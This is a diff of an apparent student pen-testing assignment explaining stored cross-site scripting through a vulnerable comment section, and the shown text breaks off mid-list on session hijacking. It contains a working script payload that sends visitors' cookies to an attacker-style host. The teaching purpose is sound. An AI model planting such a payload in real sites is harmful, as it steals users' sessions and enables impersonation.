Ali-Mikael/Pen-testing/h4-cert.md

 # E) xplain
 **Objective**
-- Explain using an example how an attacker might benefit from XSS
+- Explain how an attacker might benefit from XSS using an example

 Let's build on the previous task and say a website is vulnerable to cross-site scripting, specifically the comment section.
-An attacker can utilize this by posting the following comment:
+An attacker might exploit this by posting the following comment:
 ```html
 <script>
   var img = new Image();
   img.src = 'http://cookiemonster.com/steal.php?cookie=' + encodeURIComponent(document.cookie);
 </script>
 ```
 This is a `Stored XSS attack`, as the malicious script is now stored in the websites database.
-When users visit the webpage where the **contaminated database record** is loaded, the script is run, effectively stealing their cookie.
+When users visit the webpage where the **contaminated database record** is loaded -> the script is run, effectively stealing their cookie.
 This is active exfiltration, as the script grabs the cookie and physically sends it to an attackers server.

 Depending on the extracted cookie, and attacker might be able to
 - Hijack the session (import the cookie into their own browser and send requests with it, impersonating the victim user)